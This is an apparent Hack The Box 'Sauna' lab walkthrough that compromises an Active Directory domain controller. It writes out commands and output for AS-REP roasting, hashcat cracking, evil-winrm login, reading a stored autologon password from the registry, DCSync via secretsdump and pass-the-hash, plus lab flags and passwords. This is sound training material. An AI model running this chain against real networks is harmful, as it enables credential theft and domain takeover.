Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Sauna – Hack The Box
AS-Rep Roasting
Task 1 – What is the name of the HTML file that reveals the names of users working at the target company?
I started by nmap scan hoping I find something on port 80
──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.95.180
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-19 20:30 CET
Nmap scan report for 10.129.95.180
Host is up (0.023s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-20 02:30:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-02-20T02:30:16
|_ start_date: N/A
|_clock-skew: 6h59m55s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 55.38 seconds
On port 80 there is a website with the list of users on IP/about.html
Task 2 – Which user has Kerberos Pre-Authentication disabled?
In Task 1 we found the domain name “EGOTISTICAL-BANK.LOCAL” (nmap scan) and we found the list of users. Let’s try to AS-REP Roast
I compiled a list of users based on first name and first name:
Administrator
Guest
krbtgt
DefaultAccount
fergus
hugo
steven
bowie
shaun
sophie
smith
bear
kerb
taylor
coins
driver
fergus.smith
hugo.bear
steven.kerb
bowie.taylor
shaun.coins
sophie.driver
fsmith
hbear
skerb
btaylor
scoins
sdriver
ferguss
hugob
stevenk
bowiet
shaunc
sophied
I then used GetNPUsers.py to find users that has kerberos Pre-Authentication disabled:
─(kali㉿kali)-[~/Desktop]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.95.180 -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[email protected]:8becf4567f72cf76e60d935d8af69182$c96a1cb5c842d160700ad354a8b0709632a833a49202dd10a8b1eefcad604b5ec80574c41082273c396f70ed26e96172684081ed74ddc67b915f022d0a5c19984f569c39724da4a23165f819b7d96edf6ca1a6ca07996597a5ba343cb4e7885fa5cae454ff323616222a5a179a7ac51d89fc72f8df539f632f2a35dba4f288ea39047fedb1d95a3a5fa7f4f41c514c62d4241233b0231e81c68f28b7169b73abbcb6a4a7634f5f7839da37f52fec93e18dada76e7981a7ae180215cbc65f29928ee600f0339d82f7b1be8621148119fe44f7203ec0522a4de2cfa6068d9696733efabd9b918cb6c1b5685d797da95f13c52ce9ae647e9a8d82f92cca29dae638
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Task 3 – What is the hash format returned from this AS-REP Roasting attack? Given the answer as the string between the first and third $ characters, including the $.
$krb5asrep$23$
Task 4 – What is the password of the user fsmith?
I then cracked the password using hashcat:
(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
Task 5 – Now that you have a valid set of credentials, on what port can you connect to the machine and get an interactive shell?
We can connect to port 5985 using evil-winrm using the following command:
──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.129.95.180 -u fsmith -p 'Thestrokes23'
Task 6 – Submit the flag located on the fsmith user’s desktop.
The flag is fee7a388998893832c5d9ff29d871ae3
Task 7 – What user is configured to autologin?
Users that can auto logon are stored in KLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. We can query this key using the following command:
reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\\Windows\\system32\\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8c9319f7
ShutdownFlags REG_DWORD 0x8000022b
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
We have now new set of credentials:
- username: svc_loanmanager
- password: Moneymakestheworldgoround!
Task 8 – What is the password of the svc_loanmanager user?
The password is Moneymakestheworldgoround! as found in question 7
Task 9 – What is the dangerous permission does Bloodhound show the svc_loanmanager user has over the domain? If there is more than one permission, give the longest.
I tried bloodhound-python from my kali using the newly found credentials but got an error. So I tried using fsmith and it worked
I then started bloodhound:
- Go To /opt
- ./bloodhound-cli up
The user svc_loanmanager has GetChangesAll on the domain
Task 10 – You know that the user svc_loanmanager is able to perform a DCSync attack. By doing so, you will get the hash for the Administrator user. What is the common name of the attack that allows users to authenticate with their hashes instead of cleartext passwords?
Pass the hash
Task 11 – Submit the flag located on the administrator user’s desktop.
Making some research, I found that GetChangesAll permits dumping hashes. Let’s try to do so using secretsdump
impacket-secretsdump EGOTISTICAL-BANK/[email protected]
I tried however the authentication failed which means the password is not up to date or the username is not valid. After many trial, I checked the SamAccoutName and found the user is svc_loanmgr:
I then performed DCSync by dumping the hashes using impacker-secrestdump:
I then passed the hash using evil-winrm:
And submitted the root flag
